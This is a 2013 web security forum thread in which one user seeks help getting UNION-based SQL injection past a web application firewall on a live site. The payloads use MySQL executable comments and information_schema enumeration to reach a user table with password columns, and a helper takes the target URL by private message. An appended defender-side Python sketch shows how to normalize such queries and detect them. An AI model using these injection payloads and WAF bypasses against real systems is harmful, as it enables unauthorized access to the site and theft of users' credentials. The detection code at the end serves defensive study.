Sla.ckers.org
How do you completely compromise a machine given a text box or badly validated input box? This is a place to talk about code issues (PHP includes, null byte injection, backticks, pipe, etc...) as well as how to properly construct an SQL injection attack. 
i can get data, plz help with this waf !!!!!
Posted by: versus
Date: May 02, 2013 09:15PM

Hi, after many tests and checks I'm blocked here:

www.site.com/?id=info_details&ida=-2 /*!%0AUNION*/ /*!%0ASELECT*/ 1,2,unhex(hex(table_name)),4,5,6,7,8,9+from /*!information_schema*/.tables limit 10,1--

I can get "user", all okay:

Now with this:

www.site.com/?id=info_details&ida=-2 /*!%0AUNION*/ /*!%0ASELECT*/ 1,2,unhex(hex(column_name)),4,5,6,7,8,9+from /*!information_schema*/.columns where table_name='users'--




I also do this:

.......table_name=CHAR(117, 115, 101, 114, 115)--

But I get nothing, I can't extract data. What's my mistake?

No error and no data :(

Tell me what's wrong plz, thanks, and for all your replies to my previous topic (thanggiangho, hack2012, ajkaro...), it helped, thank you very much :)

Re: i can get data, plz help with this waf !!!!!
Posted by: ajkaro
Date: May 03, 2013 07:16AM

Send me your URL to PM if you want me to check...

Re: i can get data, plz help with this waf !!!!!
Posted by: versus
Date: May 04, 2013 05:05AM

OK, I have this table:
I get the table like this:

-7 /*!%0AUNION*/ /*!%0ASELECT*/ 1,2,unhex(hex(table_name)),4,5,6,7,8,9+from /*!information_schema*/./*!tables*/ where table_schema=database() limit 12,1--

I have the table


user

with this column:

This is the command:


-7 /*!%0AUNION*/ /*!%0ASELECT*/ 1,2,unhex(hex(column_name)),4,5,6,7,8,9+from /*!information_schema*/./*!columns*/ where table_schema=database() limit 18,1--

user_id
user_nom
user_description
user_password



But when I do this:


-7 /*!%0AUNION*/ /*!%0ASELECT*/ 1,2,unhex(hex(user_id)),4,5,6,7,8,9+from+user--



I have this:


Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in


What's wrong :(

Re: i can get data, plz help with this waf !!!!!
Posted by: hack2012
Date: May 04, 2013 06:35AM

Maybe you can try:
-7 /*!%0AUNION*/ /*!%0ASELECT*/ 1,2,user_id,4,5,6,7,8,9+from+user--
or
-7 /*!%0AUNION*/ /*!%0ASELECT*/ 1,2,/*!user_id*/,4,5,6,7,8,9+from+user--

Re: i can get data, plz help with this waf !!!!!
Posted by: versus
Date: May 04, 2013 07:43AM

Thanks for the reply.

It's not working.

Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in

Always this message :(

Re: i can get data, plz help with this waf !!!!!
Posted by: versus
Date: May 06, 2013 05:02PM

Plz check your PM.



"Posted by: ajkaro
Send me your URL to PM if you want me to check..."

Re: i can get data, plz help with this waf !!!!!
Posted by: ajkaro
Date: May 06, 2013 06:57PM

solved. See your PM...

Re: i can get data, plz help with this waf !!!!!
Posted by: versus
Date: May 06, 2013 08:02PM

Thanks man, you are the best.

Sorry for the misunderstanding, plz read my PM.
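
Added example, not part of any post in this thread: a defender-side sketch of why a plain keyword filter misses the `/*!%0AUNION*/` form quoted above, and how decoding and unwrapping MySQL executable comments before matching catches it. The function names, rule names and sample query strings are constructed for illustration and are not taken from any WAF product.

```python
import re
from urllib.parse import unquote_plus

# MySQL executes the body of /*! ... */ (optionally prefixed by a version
# number), so a filter must inspect that body instead of skipping it.
EXEC_COMMENT = re.compile(r"/\*!(?:\d{5,6})?(.*?)\*/", re.S)
PLAIN_COMMENT = re.compile(r"/\*.*?\*/", re.S)

# Hypothetical rule set, applied only to normalized text.
RULES = [
    ("union_select", re.compile(r"\bunion\s+(?:all\s+|distinct\s+)?select\b")),
    ("information_schema",
     re.compile(r"\binformation_schema\s*\.\s*(?:tables|columns)\b")),
    ("hex_roundtrip", re.compile(r"\bunhex\s*\(\s*hex\s*\(")),
]

def normalize(raw_query: str) -> str:
    """Reduce a raw query string to the text MySQL would effectively parse."""
    text = unquote_plus(raw_query)          # %0A -> newline, '+' -> space
    text = EXEC_COMMENT.sub(r" \1 ", text)  # keep the executable body
    text = PLAIN_COMMENT.sub(" ", text)     # ordinary comments act as whitespace
    return re.sub(r"\s+", " ", text).strip().lower()

def naive_match(raw_query: str) -> bool:
    """Keyword check on the undecoded string, as a simple filter might do."""
    return re.search(r"union\s+select", raw_query, re.I) is not None

def detect(raw_query: str) -> list:
    """Return the names of the rules that fire on the normalized query."""
    text = normalize(raw_query)
    return [name for name, rx in RULES if rx.search(text)]

# Constructed sample query strings (not taken from real logs).
SAMPLES = [
    "id=info_details&ida=-2+/*!%0AUNION*/+/*!%0ASELECT*/+1,2,"
    "unhex(hex(table_name)),4+from+/*!information_schema*/./*!tables*/+limit+10,1--",
    "id=info_details&ida=2",
    "q=credit+union+branches",
]

if __name__ == "__main__":
    for sample in SAMPLES:
        print(naive_match(sample), detect(sample), sample[:50])
```

Matching of this kind is a detection aid only; the query behind the `ida` parameter still needs to bind its input as a parameter rather than concatenate it.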
